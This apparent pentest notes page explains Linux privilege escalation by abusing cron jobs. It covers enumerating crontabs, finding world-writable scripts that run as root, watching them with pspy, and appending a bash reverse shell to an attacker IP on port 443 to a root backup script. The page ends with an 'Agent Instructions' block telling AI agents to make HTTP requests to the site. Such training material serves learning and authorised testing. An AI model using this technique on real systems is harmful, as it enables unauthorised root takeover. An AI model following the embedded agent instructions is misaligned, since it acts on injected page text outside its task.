# Cron Job Abuse Each entry in the crontab file requires six items in the following order: minutes, hours, days, months, weeks, commands. For example, the entry `0 */12 * * * /home/admin/backup.sh` would run every 12 hours ## Enumeration ``` cat /etc/crontab crontab -l # user cronjobs sudo crontab -l # root cronjobs ``` ## Writeable files or directories 1. `/etc/crontab` 2. `/etc/cron.d` 3. `/var/spool/cron/crontabs/root` If we can write to a directory called by a cron job, we can write a bash script with a reverse shell command, which should send us a reverse shell when executed. ### Writable files ```shell-session find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null /etc/cron.daily/backup /dmz-backups/backup.sh /proc /sys/fs/cgroup/memory/init.scope/cgroup.event_control /home/backupsvc/backup.sh ``` Files created every three minutes + `backup.sh` shell script is world writeable and runs as root. ```shell-session ls -la /dmz-backups/ total 36 drwxrwxrwx 2 root root 4096 Aug 31 02:39 . drwxr-xr-x 24 root root 4096 Aug 31 02:24 .. -rwxrwxrwx 1 root root 230 Aug 31 02:39 backup.sh -rw-r--r-- 1 root root 3336 Aug 31 02:24 www-backup-2020831-02:24:01.tgz -rw-r--r-- 1 root root 3336 Aug 31 02:27 www-backup-2020831-02:27:01.tgz -rw-r--r-- 1 root root 3336 Aug 31 02:30 www-backup-2020831-02:30:01.tgz -rw-r--r-- 1 root root 3336 Aug 31 02:33 www-backup-2020831-02:33:01.tgz -rw-r--r-- 1 root root 3336 Aug 31 02:36 www-backup-2020831-02:36:01.tgz -rw-r--r-- 1 root root 3336 Aug 31 02:39 www-backup-2020831-02:39:01.tgz ``` Confirm that a cron job is running using [pspy](https://github.com/DominicBreuker/pspy) ```shell-session ./pspy64 -pf -i 1000 ``` {% hint style="info" %} If editing a script, make sure to `ALWAYS` take a copy of the script and/or create a backup of it. We should also attempt to append our commands to the end of the script to still run properly before executing our reverse shell command. {% endhint %} ```shell-session cat /dmz-backups/backup.sh #!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR ``` Modify the script to add a [Bash one-liner reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) ```bash #!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR bash -i >& /dev/tcp/10.10.14.3/443 0>&1 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/cron-job-abuse.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.